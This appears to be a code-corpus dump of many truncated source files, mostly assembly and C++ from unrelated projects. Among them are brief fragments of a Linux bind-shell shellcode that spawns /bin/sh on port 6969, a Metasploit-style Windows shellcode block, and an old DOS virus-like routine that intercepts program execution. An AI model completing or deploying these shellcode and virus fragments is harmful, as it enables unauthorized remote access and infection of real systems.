text stringlengths 1 1.05M |
|---|
//===----------------------------------------------------------------------===//
// DuckDB
//
// duckdb/storage/table/standard_column_data.hpp
//
//
//===----------------------------------------------------------------------===//
#pragma once
#include "duckdb/storage/table/column_data.hpp"
#in... |
; wa_priority_queue_t *
; wa_priority_queue_init(void *p, void *data, size_t capacity, int (*compar)(const void *, const void *))
SECTION code_clib
SECTION code_adt_wa_priority_queue
PUBLIC wa_priority_queue_init_callee
EXTERN asm_wa_priority_queue_init
wa_priority_queue_init_callee:
pop hl
pop ix
pop bc... |
.global s_prepare_buffers
s_prepare_buffers:
push %r14
push %r15
push %r8
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0xfe39, %rsi
lea addresses_D_ht+0x8b89, %rdi
add $48782, %r14
mov $12, %rcx
rep movsw
nop
sub $31005, %r8
lea addresses_UC_ht+0x142b9, %rsi
lea addresses_UC_ht+0xd639, %rdi
nop
... |
; UCSD p-System IV CBIOS for Z80-Simulator
;
; Copyright (C) 2008 by Udo Munk
;
MSIZE EQU 64 ;memory size in kilobytes
BIAS EQU (MSIZE*1024)-01900H
BIOS EQU 1500H+BIAS ;base of bios
;
; I/O ports
;
CONSTA EQU 0 ;console status port
CONDAT EQU 1 ;console data port
PRTSTA EQU 2 ;printer status port
PRTDAT EQU 3 ;pri... |
.data
SideLen: .word 8
Perimeter: .space 4
#############################################################################
.text
.globl main
main: lw $t0, SideLen
sll $t0, $t0, 2
sw $t0, Perimeter
|
#include "LumenPCH.h"
#include "Framework/Window.h"
//#include "RTScene.h"
#include "RayTracer/RayTracer.h"
void window_size_callback(GLFWwindow* window, int width, int height) {}
int main(int argc, char* argv[]) {
#ifdef NDEBUG
bool enable_debug = false;
#else
bool enable_debug = true;
#endif
bool fullscreen = fa... |
%include "../../defaults_bin.asm"
; Mode
; 1 +HRES
; 2 +GRPH
; 4 +BW
; 8 +VIDEO ENABLE
; 0x10 +1BPP
; 0x20 +ENABLE BLINK
mov dx,0x3d8
mov al,2
out dx,al
; Palette
; 1 +OVERSCAN B
; 2 +OVERSCAN G
; 4 +OVERSCAN R
; 8 +OVERSCAN I
; 0x10 +BAC... |
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1991 -- All Rights Reserved
PROJECT: PC GEOS
MODULE:
FILE: tlSmallLineInfo.asm
AUTHOR: John Wedgwood, Dec 26, 1991
ROUTINES:
Name Description
---- -----------
REVISION HISTORY:
Name Dat... |
/******************************************************************************
* Project: Selafin importer
* Purpose: Implementation of OGR driver for Selafin files.
* Author: François Hissel, francois.hissel@gmail.com
*
******************************************************************************
* Copyrig... |
%include oxylib/oxysound.asm
%include oxylib/oxygame.asm
%include oxylib/oxyrand.asm
; on inclut le sprite du virus, situé dans le dossier assets
%include assets/drawV3.asm
%include assets/drawV3a.asm
DSEG SEGMENT
; position du joueur
playerX DW ?
playerY DW ?
; 1 si le joueur ... |
/*******************************************************************************
* Copyright (c) 2021, Yasuhiro Hasegawa
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributio... |
/******************************************************************************
* Copyright 2018 The Apollo Authors. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
... |
; Listing generated by Microsoft (R) Optimizing Compiler Version 16.00.30319.01
; Generated by VC++ for Common Language Runtime
.file "c:\projects\CelikNET\CelikNET\Stdafx.cpp"
.global ___@@_PchSym_@00@UkilqvxghUxvorpmvgUxvorpmvgUivovzhvUhgwzucOlyq@
.bss
.local ___@@_PchSym_@00@UkilqvxghUxvorpmvgUxvorpmvgUivovzhvUh... |
_test: file format elf32-i386
Disassembly of section .text:
00000000 <main>:
return result;
}
int main(void) {
0: 55 push %ebp
run_test(&test_exit_wait, "exit&wait");
1: b8 88 10 00 00 mov $0x1088,%eax
int main(void) {
6: 89 e5 mov ... |
/*
Copyright 2013-present Barefoot Networks, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in w... |
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r14
push %r8
push %rax
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0x332d, %r8
sub $41699, %r14
movw $0x6162, (%r8)
add $19553, %r11
lea addresses_A_ht+0x1b02d, %rbx
nop
nop
nop
dec %r8
movl $0x61626364, (%rbx)
nop
nop
nop
nop
nop
and %rax, %ra... |
//
// Copyright Copyright 2009-2022, AMT – The Association For Manufacturing Technology (“AMT”)
// All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// ... |
//
// fountain-encoder.cpp
//
// Copyright © 2020 by Blockchain Commons, LLC
// Licensed under the "BSD-2-Clause Plus Patent License"
//
#include "fountain-encoder.hpp"
#include <assert.h>
#include <cmath>
//#include <optional>
#include <vector>
//#include <limits>
//#include "cbor-lite.hpp"
#include <ArduinoSTL.h>... |
.global s_prepare_buffers
s_prepare_buffers:
push %r13
push %r15
push %r9
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WC_ht+0x163d1, %r9
add $38535, %r15
movw $0x6162, (%r9)
nop
nop
nop
nop
sub $9189, %rbp
lea addresses_A_ht+0xac9, %rsi
lea addresses_UC_ht+0x7ad1, %rdi
nop
and $14333, %rdx
mov $44, ... |
; void __CALLEE__ sp1_InitCharStruct_callee(struct sp1_cs *cs, void *drawf, uchar type, void *graphic, uchar plane)
; 01.2008 aralbrec, Sprite Pack v3.0
; ts2068 hi-res version
PUBLIC sp1_InitCharStruct_callee
PUBLIC ASMDISP_SP1_INITCHARSTRUCT_CALLEE
EXTERN _sp1_struct_cs_prototype
EXTERN SP1V_ROTTBL
.sp1_InitCharSt... |
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r12
push %r15
push %r8
push %r9
push %rcx
push %rdi
push %rsi
lea addresses_A_ht+0x1d325, %r15
nop
nop
nop
nop
nop
sub $3965, %r11
mov $0x6162636465666768, %r10
movq %r10, %xmm2
vmovups %ymm2, (%r15)
lfence
lea addresses_WT_ht+0x1c580, %r9
clflush (... |
lc r4, 0x7fffffff
lc r5, 0x00000101
ges r6, r4, r5
halt
#@expected values
#r4 = 0x7fffffff
#r5 = 0x00000101
#r6 = 0x00000001
#pc = -2147483628
#e0 = 0
#e1 = 0
#e2 = 0
#e3 = 0
|
/* <bruce/discard_file_logger.cc>
----------------------------------------------------------------------------
Copyright 2013-2014 if(we)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License... |
// Copyright (C) 2011-2020 Roki. Distributed under the MIT License
#ifndef INCLUDED_SROOK_TMPL_VT_SIZE_HPP
#define INCLUDED_SROOK_TMPL_VT_SIZE_HPP
#include <srook/tmpl/vt/detail/config.hpp>
SROOK_NESTED_NAMESPACE(srook, tmpl, vt) {
SROOK_INLINE_NAMESPACE(v1)
template <class...>
struct size;
template <>
struct size<... |
;;
;; Copyright (c) 2019-2021, Intel Corporation
;;
;; Redistribution and use in source and binary forms, with or without
;; modification, are permitted provided that the following conditions are met:
;;
;; * Redistributions of source code must retain the above copyright notice,
;; this list of conditions and... |
; A200815: Number of iterations of k -> d(k) until n reaches an odd prime.
; 0,1,0,2,0,2,1,2,0,3,0,2,2,1,0,3,0,3,2,2,0,3,1,2,2,3,0,3,0,3,2,2,2,2,0,2,2,3,0,3,0,3,3,2,0,3,1,3,2,3,0,3,2,3,2,2,0,4,0,2,3,1,2,3,0,3,2,3,0,4,0,2,3,3,2,3,0,3,1,2,0,4,2,2,2,3,0,4,2,3,2,2,2,4,0,3,3,2,0,3
add $0,2
lpb $0
seq $0,5 ; d(n) (also ca... |
%include "include/u7si-all-includes.asm"
defineAddress 119, 0x0410, valueForKey
defineAddress 119, 0x04E9, valueForKey_end
defineAddress 119, 0x068C, mouseActionInAx
defineAddress 119, 0x0693, endProc
%include "../u7-common/patch-keyMouseKeys.asm"
|
/**
* Marlin 3D Printer Firmware
* Copyright (c) 2020 MarlinFirmware [https://github.com/MarlinFirmware/Marlin]
*
* Based on Sprinter and grbl.
* Copyright (c) 2011 Camiel Gubbels / Erik van der Zalm
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General... |
;
; Small C z88 Misc functions
;
; sleep(time)
;
; Pause for time centiseconds
;
; djm 1/12/98
;
; If we can't have usleep we'll have csleep instead!
;
; -----
; $Id: csleep.asm,v 1.9 2016-07-02 15:44:16 dom Exp $
MODULE csleep_z88
SECTION code_clib
INCLUDE "time.def"
PUBLIC c... |
;
; bintree.asm : Binary Tree implementation
; Author : Rob Neff
;
; Copyright (C)2010 Piranha Designs, LLC - All rights reserved.
; Source code licensed under the new/simplified BSD OSI license.
;
; Redistribution and use in source and binary forms, with or without
; modification, are permitted provided t... |
;===============================================================================
; Copyright 2014-2021 Intel Corporation
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
; http://www.apa... |
// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "components/password_manager/core/browser/form_parsing/fuzzer/data_accessor.h"
#include "base/strings/string16.h"
#include "base/strings/utf_str... |
/*
ffplay.cpp - Implementation file for the static AV_IO class.
Revision 0
Notes:
-
2019/10/15 - Maya Posch
*/
#include "ffplay.h"
//#define DEBUG 1
/* current context */
int is_full_screen;
int64_t audio_callback_time;
//FileMetaInfo file_meta;
// Static defines.
std::atomic<uint64_t> FileMetaIn... |
; A024893: Numbers k such that 3*k+2 is prime.
; Submitted by Jon Maiga
; 0,1,3,5,7,9,13,15,17,19,23,27,29,33,35,37,43,45,49,55,57,59,63,65,75,77,79,83,85,87,89,93,97,103,105,115,117,119,127,129,133,139,143,147,149,153,155,159,163,167,169,173,185,187,189,195,197,199,205,213,215,217,219,225,227,233,239,247,253,257,265,2... |
; A047261: Numbers that are congruent to {2, 4, 5} mod 6.
; 2,4,5,8,10,11,14,16,17,20,22,23,26,28,29,32,34,35,38,40,41,44,46,47,50,52,53,56,58,59,62,64,65,68,70,71,74,76,77,80,82,83,86,88,89,92,94,95,98,100,101,104,106,107,110,112,113,116,118,119,122,124,125,128,130,131,134,136,137,140,142,143,146,148,149,152,154,155,1... |
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modi... |
#include "gol_demo.hpp"
#include <chrono>
#include <cstdint>
#include <string>
#include <termox/widget/focus_policy.hpp>
#include <termox/widget/layouts/horizontal.hpp>
#include <termox/widget/widgets/accordion.hpp>
#include "patterns.hpp"
namespace gol {
GoL_demo::GoL_demo()
{
this->focus_policy = ox::Focus_p... |
// Copyright 2018 marcusolini@outlook.com
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// LeakLib.cpp : Defines the exported functions for the DLL application.
//
#ifdef _WIN32
#define WIN32_LEAN_AND_MEAN
#include "... |
;
; Copyright (c) 2015 Digi International Inc.
;
; This Source Code Form is subject to the terms of the Mozilla Public
; License, v. 2.0. If a copy of the MPL was not distributed with this
; file, You can obtain one at http://mozilla.org/MPL/2.0/.
;
; feilipu, 2019 April
; adapted for z80, z180, and z80n
;
;-----... |
; A115125: A sequence related to Catalan numbers A000108.
; 1,2,4,16,80,448,2688,16896,109824,732160,4978688,34398208,240787456,1704034304,12171673600,87636049920,635361361920,4634400522240,33985603829760,250420238745600,1853109766717440,13765958267043840,102618961627054080,767411365211013120,5755585239082598400,432820... |
db DEX_YANMEGA ; pokedex id
db 86 ; base hp
db 76 ; base attack
db 86 ; base defense
db 95 ; base speed
db 86 ; base special
db BUG ; species type 1
db DRAGON ; species type 2
db 46 ; catch rate
db 160 ; base exp yield
INCBIN "pic/ymon/yanmega.pic",0,1 ; 77, sprite dimensions
dw YanmegaPicFront
dw YanmegaPicBack
; atta... |
;*****************************************************************************
;* cabac-a.asm: x86 cabac
;*****************************************************************************
;* Copyright (C) 2008-2012 x264 project
;*
;* Authors: Loren Merritt <lorenm@u.washington.edu>
;* Jason Garrett-Glaser <darkshi... |
LJMP START
ORG 100H
START:
MOV A, #0
CALL WAIT_KEY ; 'lewa' cyfra
MOV B, #10
MUL AB
;przenieś zawartość do R3
MOV R3, A
; pobierz prawą cyfrę
CALL WAIT_KEY
ADD A, R3
MOV R2, A
CALL LCD_CLR
MOV A, R2
MOV R5, A
MOV A, #0
CALL W... |
// testing two instantiations of class template with same integer
// arguments
template<int I> struct A {
};
A<2> a2;
A<2> a2a;
A<3> a3;
|
; A171543: Decimal expansion of 2/sqrt(35).
; Submitted by Jamie Morken(s1)
; 3,3,8,0,6,1,7,0,1,8,9,1,4,0,6,6,3,1,0,0,3,8,4,7,3,3,0,9,4,6,3,7,8,1,1,7,0,5,2,3,1,4,3,5,6,0,4,5,3,9,0,8,7,5,5,9,3,1,2,6,8,3,8,2,3,6,7,3,2,7,1,1,9,4,8,8,9,4,4,5,9,2,4,3,7,5,7,2,8,7,2,6,7,6,0,6,2,3,8,7
mov $1,1
mov $2,1
mov $3,$0
mul $3,4
lpb ... |
; void tm_from_dostm(struct tm *,struct dos_tm *)
SECTION code_time
PUBLIC _tm_from_dostm
EXTERN asm_tm_from_dostm
_tm_from_dostm:
pop af
pop de
pop hl
push hl
push de
push af
jp asm_tm_from_dostm
|
; A017528: (12n)^8.
; 0,429981696,110075314176,2821109907456,28179280429056,167961600000000,722204136308736,2478758911082496,7213895789838336,18509302102818816,42998169600000000,92170395205042176
pow $0,8
mul $0,429981696
|
;-----------------------------------------------------------------------------;
; Author: (mostly) Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (31 October 2009)
; Size:
; Build: >build.py wrapped_jmp
;---------------------------------... |
//
// Created by Andrew Bailey on 10/14/19.
//
// local lib
#include "EventDetection.hpp"
#ifndef EVENTDETECTION_SRC_EVENTDETECTMAIN_HPP_
#define EVENTDETECTION_SRC_EVENTDETECTMAIN_HPP_
int detect_main(int argc, char** argv);
void event_detect(string const &fast5_path, string const &output_dir = string(), bool embe... |
; A308305: a(n) = s(n,n) + s(n,n-1) + s(n,n-2), where s(n,k) are the unsigned Stirling numbers of the first kind (see A132393).
; 1,2,6,18,46,101,197,351,583,916,1376,1992,2796,3823,5111,6701,8637,10966,13738,17006,20826,25257,30361,36203,42851,50376,58852,68356,78968,90771,103851,118297,134201,151658,170766,191626,214... |
; size_t b_vector_append_n(b_vector_t *v, size_t n, int c)
SECTION code_adt_b_vector
PUBLIC _b_vector_append_n
EXTERN asm_b_vector_append_n
_b_vector_append_n:
pop af
pop hl
pop de
pop bc
push bc
push de
push hl
push af
jp asm_b_vector_append_n
|
;===============================================================================
;- Programm: BCD-Clock
;-
;- Dateinname: BCD-Clock.asm
;- Version: 1.0
;- Autor: Benj Fassbind
;-
;- Verwendungszweck: uP-Schulung
;-
;- Beschreibung:
;-
;- A BCD Second Clock wich shows the Seconds
;-
;- Entwick... |
; A094952: A sequence derived from pentagonal numbers, or a Stirling number of the first kind matrix.
; 6,35,105,234,440,741,1155,1700,2394,3255,4301,5550,7020,8729,10695,12936,15470,18315,21489,25010,28896,33165,37835,42924,48450,54431,60885,67830,75284,83265,91791,100880,110550,120819,131705,143226
add $0,1
mov $2,$... |
// from SimpleAdd.vm
// push 7 onto the stack
@7
D=A
@SP
A=M
M=D
@SP
M=M+1
// push 8 onto the stack
@8
D=A
@SP
A=M
M=D
@SP
M=M+1
// add
@SP
AM=M-1
D=M
@SP
A=M-1
M=M+D
|
PAGE 60,132
;
XSEG SEGMENT
; Seg=01387H
; Org=00000H
ASSUME CS:XSEG
XPROC PROC FAR
JMP L6551
DEC BX
PUSH BX
PUSH CX
CALL L0009
L0009: POP SI
SUB SI,+09H
PUSH SI
CLD
MOV DI,0100H
MOV CX,0005H
MOVSB
JMP L01CE
L001A: PUSHF
PUSH CS
CALL WORD PTR CS:[08C0H]
DB 0C3H; RET
STI
CMP AH,4BH
JE L0061
CMP AH,... |
SFX_Teleport_Enter1_3_Ch4:
duty 1
unknownsfx0x10 23
unknownsfx0x20 15, 215, 0, 7
unknownsfx0x20 15, 183, 128, 6
unknownsfx0x20 15, 135, 0, 6
unknownsfx0x20 15, 71, 128, 5
unknownsfx0x20 15, 23, 0, 5
unknownsfx0x10 8
endchannel
|
MODULE __scanf_handle_n
SECTION code_clib
PUBLIC __scanf_handle_n
EXTERN __scanf_nextarg
EXTERN scanf_loop
__scanf_handle_n:
bit 3,(ix-3) ;suppressed?
jp nz,scanf_loop
call __scanf_nextarg
ld a,(ix-6)
ld (de),a
inc de
ld ... |
#include "EventFilter/CSCRawToDigi/interface/CSCEventData.h"
#include "EventFilter/CSCRawToDigi/interface/CSCCFEBData.h"
#include "DataFormats/CSCDigi/interface/CSCStripDigi.h"
#include "FWCore/MessageLogger/interface/MessageLogger.h"
#include "EventFilter/CSCRawToDigi/src/cscPackerCompare.h"
#include <iostream>
#inclu... |
SECTION rodata_clib
PUBLIC itox_basechar
.itox_basechar defm "0123456789abcdefghijklmnopqrstuvwxyz"
|
; A229232: Number of undirected circular permutations pi(1), ..., pi(n) of 1, ..., n with the n numbers pi(1)*pi(2)-1, pi(2)*pi(3)-1, ..., pi(n-1)*pi(n)-1, pi(n)*pi(1)-1 all prime.
; 0,0,0,1,0,2,1,2,2,8
lpb $0
mov $2,$0
add $0,11
cmp $3,0
add $1,$3
div $2,$1
mov $1,$0
div $0,10
mul $0,2
dif $2,2
su... |
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <arc/XMLNode.h>
#include <string>
#include <iostream>
#include <fstream>
#include <glibmm/fileutils.h>
#include <algorithm>
#include <unistd.h>
#include <string.h>
#include "schemaconv.h"
Arc::NS ns;
struct to_upper {
int operator() (int ch)
{
return ... |
; A239325: a(n) = 6*n^2 + 8*n + 1.
; 1,15,41,79,129,191,265,351,449,559,681,815,961,1119,1289,1471,1665,1871,2089,2319,2561,2815,3081,3359,3649,3951,4265,4591,4929,5279,5641,6015,6401,6799,7209,7631,8065,8511,8969,9439,9921,10415,10921,11439,11969
mov $1,6
mul $1,$0
add $1,8
mul $1,$0
add $1,1
mov $0,$1
|
.global s_prepare_buffers
s_prepare_buffers:
push %r9
push %rax
push %rbx
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_UC_ht+0x1938a, %rdx
nop
and $35505, %rbx
movups (%rdx), %xmm0
vpextrq $0, %xmm0, %rdi
nop
nop
nop
nop
nop
and %rsi, %rsi
lea addresses_WC_ht+0x12b2a, %rsi
lea addresses_D_ht+0xb79e, %rdi
add $... |
; A145018: a(n) = (n^2 - n + 8)/2.
; 4,5,7,10,14,19,25,32,40,49,59,70,82,95,109,124,140,157,175,194,214,235,257,280,304,329,355,382,410,439,469,500,532,565,599,634,670,707,745,784,824,865,907,950,994,1039,1085,1132,1180,1229,1279,1330,1382,1435,1489,1544,1600,1657,1715,1774,1834,1895,1957,2020,2084,2149,2215,2282,2350,... |
// Copyright Catch2 Authors
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// https://www.boost.org/LICENSE_1_0.txt)
// SPDX-License-Identifier: BSL-1.0
// Adapted from donated nonius code.
#include <catch2/catch_test_macros.hp... |
; ===============================================================
; Jun 2007
; ===============================================================
;
; void *zx_pxy2saddr(uchar x, uchar y)
;
; Screen address of byte containing pixel at coordinate x, y.
;
; ===============================================================
IN... |
/*
* Copyright © <2010>, Intel Corporation.
*
* This program is licensed under the terms and conditions of the
* Eclipse Public License (EPL), version 1.0. The full text of the EPL is at
* http://www.opensource.org/licenses/eclipse-1.0.php.
*
*/
//////////////////////////////////////////////////////////... |
main:
PRINT "Hello there, how are you?\n"
JMP one_sided_conversation ; This will jump to the one_sided_conversation label,
; thus skipping the next PRINT command,
; giving us a one-sided conversation.
... |
#ifndef NO_WX
#include <wx/wx.h>
#include <wx/dcgraph.h>
#include <wx/fontutil.h>
#include <wx/bitmap.h>
#include <wx/image.h>
#include <wx/string.h>
#include <cstring>
#endif
#include "gks.h"
#include "gkscore.h"
#ifdef __cplusplus
extern "C" {
#endif
#ifdef _WIN32
#include <windows.h>
#ifndef DLLEXPORT
#define... |
;--------------------------------------------------------
; File Created by C51
; Version 1.0.0 #1069 (Apr 23 2015) (MSVC)
; This file was generated Thu Apr 07 01:07:38 2016
;--------------------------------------------------------
$name autonomous_v4
$optc51 --model-small
R_DSEG segment data
R_CSEG seg... |
; A097297: Seventh column (m=6) of (1,6)-Pascal triangle A096956.
; 6,37,133,364,840,1722,3234,5676,9438,15015,23023,34216,49504,69972,96900,131784,176358,232617,302841,389620,495880,624910,780390,966420,1187550,1448811,1755747,2114448,2531584,3014440,3570952,4209744
mov $1,37
add $1,$0
mov $2,5
add $2,$0
bin $2,5
mul... |
; A083028: Numbers that are congruent to {0, 2, 3, 5, 7, 8, 11} mod 12.
; 0,2,3,5,7,8,11,12,14,15,17,19,20,23,24,26,27,29,31,32,35,36,38,39,41,43,44,47,48,50,51,53,55,56,59,60,62,63,65,67,68,71,72,74,75,77,79,80,83,84,86,87,89,91,92,95,96,98,99,101,103,104,107,108,110,111
mul $0,4
mov $1,2
mov $2,2
lpb $0,1
trn $0,2... |
/*!
******************************************************************************
*
* \file
*
* \brief Header file for common RAJA internal macro definitions.
*
******************************************************************************
*/
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~... |
; / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / /
; / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / /
; / / / /
; / / Copyright 2021 (c) Navegos QA - optim... |
/*
Copyright 2009-2021 Nicolas Colombe
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute... |
;
; Copyright (C) 2021 by Intel Corporation
;
; Permission to use, copy, modify, and/or distribute this software for any
; purpose with or without fee is hereby granted.
;
; THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
; REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHA... |
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r12
push %r13
push %r9
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_A_ht+0x7b56, %r9
nop
nop
inc %rsi
vmovups (%r9), %ymm7
vextracti128 $1, %ymm7, %xmm7
vpextrq $1, %xmm7, %rbx
nop
nop
nop
sub %rcx, %rcx
lea addresses_WT_ht+0x10a46, %r9
nop
sub $2622... |
/*
*
* Copyright 2016 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agree... |
; A142433: Primes congruent to 23 mod 49.
; Submitted by Jon Maiga
; 23,317,709,1297,1493,1787,2081,2179,2473,2767,2963,3061,3257,3943,4139,5021,5119,5413,5903,6197,6491,6883,7079,7177,8059,8353,8647,8941,9137,9431,10313,10607,11489,11587,11783,12763,12959,13841,14723,14821,15017,16193,16487,16879,17467,17761,17957,182... |
/*
* jdphuff.c
*
* Copyright (C) 1995-1997, Thomas G. Lane.
* This file is part of the Independent JPEG Group's software.
* For conditions of distribution and use, see the accompanying README file.
*
* This file contains Huffman entropy decoding routines for progressive JPEG.
*
* Much of the complexit... |
; A180602: (2^(n+1) - 1)^n.
; 1,3,49,3375,923521,992436543,4195872914689,70110209207109375,4649081944211090042881,1227102111503512992112190463,1291749870339606615892191271170049
mov $1,2
mov $2,$0
add $2,1
pow $1,$2
sub $1,1
pow $1,$0
mov $0,$1
|
; ===============================================================
; Mar 2014
; ===============================================================
;
; int ba_priority_queue_empty(ba_priority_queue_t *q)
;
; Return non-zero if the queue is empty.
;
; ===============================================================
SECTION... |
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r12
push %r14
push %rcx
push %rdi
push %rsi
lea addresses_A_ht+0x1bf8c, %rsi
lea addresses_A_ht+0x1226c, %rdi
nop
and %r12, %r12
mov $123, %rcx
rep movsl
nop
nop
nop
nop
nop
xor $19594, %r11
lea addresses_A_ht+0x1dc4c, %rdi
nop
nop
xor %r14, %r14
mov (%rdi), ... |
; A262616: Triangle read by rows: T(n,k) = 4^(n-k), n>=0, 0<=k<=n.
; 1,4,1,16,4,1,64,16,4,1,256,64,16,4,1,1024,256,64,16,4,1,4096,1024,256,64,16,4,1,16384,4096,1024,256,64,16,4,1,65536,16384,4096,1024,256,64,16,4,1,262144,65536,16384,4096,1024,256,64,16,4,1,1048576,262144,65536,16384,4096,1024,256,64,16,4,1,4194304,104... |
global start
%include 'common.inc'
section code
start:
mov ax, data
mov ds, ax
SET_VIDEO_MODE MODE_V640x350x16
; Colored pattern
cld
mov ax, VGA_VIDEO_SEGMENT
mov es, ax
mov ah, 3 ; initial pattern
mov cx, 4 ; number of planes
WITH_PORT SC, SC_MAP_MASK
.FillBitMap:
mov al, ... |
; A077450: Continued fraction expansion of (29+sqrt(145))/12.
; 3,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1,1,2,2,1,1
lpb $0
sub $2,1
add $0,$2
mod $0,5
lpe
mov $0,$2
... |
; uint sp1_AddColSpr(struct sp1_ss *s, uchar type, int graphic, uchar plane)
SECTION code_clib
SECTION code_temp_sp1
PUBLIC sp1_AddColSpr
EXTERN asm_sp1_AddColSpr
sp1_AddColSpr:
pop af
pop hl
ld h,l
pop bc
pop de
ld l,e
pop de
pop ix
push hl
push hl
push de
push bc
push hl
... |
; A317323: Multiples of 23 and odd numbers interleaved.
; 0,1,23,3,46,5,69,7,92,9,115,11,138,13,161,15,184,17,207,19,230,21,253,23,276,25,299,27,322,29,345,31,368,33,391,35,414,37,437,39,460,41,483,43,506,45,529,47,552,49,575,51,598,53,621,55,644,57,667,59,690,61,713,63,736,65,759,67,782,69,805,71,828,73,851,75,874,77,... |
// Copyright (c) 2011-2013 The Bitcoin developers
// Distributed under the MIT/X11 software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#include <QApplication>
#include "bitcoingui.h"
#include "transactiontablemodel.h"
#include "optionsdialog.h"
#include "abou... |
; A059153: a(n) = 2^(n+2)*(2^(n+1)-1).
; 4,24,112,480,1984,8064,32512,130560,523264,2095104,8384512,33546240,134201344,536838144,2147418112,8589803520,34359476224,137438429184,549754765312,2199021158400,8796088827904,35184363700224,140737471578112,562949919866880,2251799746576384,9007199120523264,36028796750528512,1441... |
; SMSQ general KBD polling routine v1.01 1988 / 1993 / 2000 Tony Tebby
; 2003 Marcel Kilgus
; 2000-06-24 1.01 Handles left and right shift key separately.
; 2006-09-28 1.02 Allows normal code for CAPS + SFHT/CTRL/ALT
; This takes a stream of keyboard codes from the internal keyboard queue.
; These codes... |
; non-NULL shellcode running /bin/sh and listening on port 6969
; -> change the port using Python:
; $ python -c "import socket; print(hex(socket.htons(PORT)))"
global _start
section .text
_start:
; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
; int sock = socket(AF_INET, S... |
// Copyright 2019 The MediaPipe Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or a... |
SECTION code_clib
PUBLIC asm_set_cursor_state
INCLUDE "mc6845.inc"
; Set the state of the hardware cursor
;
; Entry: l = cursor state:
; 0x00 = always on
; 0x20 = off
; 0x40 = fast blink
; 0x60 = slow blink
;
; Uses: af, l
asm_set_cursor_state:
ld a,0x0a ; start_ras
out (address_w),a
in a,(registe... |
SECTION code_fp_am9511
PUBLIC ___fs2slong_callee
EXTERN cam32_sdcc___fs2slong_callee
defc ___fs2slong_callee = cam32_sdcc___fs2slong_callee
|
INCLUDE "defines.asm"
SECTION "Intro", ROMX
Intro::
ld hl, vSpriteTile
ld de, SpriteTile
ld c, SpriteTile.end - SpriteTile
call LCDMemcpySmall
ld hl, wShadowOAM
ld a, 16 + 16
ld [hli], a
ld [hli], a
xor a
ld [hli], a
ld [hli], a
ld a, h
ld [hOAMHigh], a
ld a, LCDCF_ON | LCDCF_OBJON | LCDCF_BGON
ld ... |
/*
*
* Copyright 2015 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agree... |
SECTION code_fp_math16
PUBLIC cm16_sdcc___h2sint
PUBLIC cm16_sdcc___h2schar
EXTERN cm16_sdcc_read1
EXTERN asm_f24_f16
